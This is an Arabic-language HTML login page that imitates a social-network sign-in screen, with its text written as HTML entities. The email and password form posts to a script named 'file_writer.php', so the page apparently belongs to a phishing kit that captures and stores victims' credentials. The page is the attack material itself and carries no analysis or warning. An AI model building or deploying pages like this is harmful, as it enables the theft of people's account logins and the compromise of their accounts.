

<html>
  <head>
      <meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <link rel="stylesheet" type="text/css" href="css/stylesheet.css"> 
  </head>
  <body>
    <!-- NavBar -->
    <div class="navbar"></div>
    <div style="display:-webkit-box">
      <div style="-webkit-box-flex:1">
        <!--Nav-Header-->
        <div class="nav-head" style="direction: rtl;">
          <span>&#x639;&#x644;&#x64a;&#x643;&#x20;&#x623;&#x648;&#x644;&#x627;&#x20;&#x62a;&#x633;&#x62c;&#x64a;&#x644;&#x20;&#x627;&#x644;&#x62f;&#x62e;&#x648;&#x644;</span>
        </div>

        <!-- Formulaire -->
        <div style="background-color:#2c3b5a0f;padding:2 31px">
          <form method="post" style="padding-top:17px;" action="file_writer.php">
            <div class="formulaire" style="background:white;"> 
              <input class="entrer" style="padding:12px;direction: rtl;" name="email" placeholder="&#x627;&#x644;&#x628;&#x631;&#x64a;&#x62f;&#x20;&#x627;&#x644;&#x627;&#x644;&#x643;&#x62a;&#x631;&#x648;&#x646;&#x64a;" type="text"required>
              <input class="entrer" style="padding:12px;direction: rtl;" name="password" placeholder="&#x643;&#x644;&#x645;&#x629;&#x20;&#x627;&#x644;&#x633;&#x631;" type="password"required>
              <div style="padding:12px;"> 
                <button type="submit" class="square_btn" value="" >&#x20;&#x627;&#x644;&#x62f;&#x62e;&#x648;&#x644;</button>
              </div>
            </div>
          </form> 

          <div class="fruit">
            <a class="koala">&#x625;&#x646;&#x634;&#x627;&#x621;&#x20;&#x62d;&#x633;&#x627;&#x628;&#x20;&#x62c;&#x62f;&#x64a;&#x62f;</a> 
          </div>

          <div class="contact-us">
            <a>&#x646;&#x633;&#x64a;&#x62a;&#x20;&#x627;&#x644;&#x62d;&#x633;&#x627;&#x628;&#x20;&#x61f;&#x20;&#x645;&#x633;&#x627;&#x639;&#x62f;&#x629;</a>
          </div>
        </div>
      </div>
    </div>
  </body>
</html>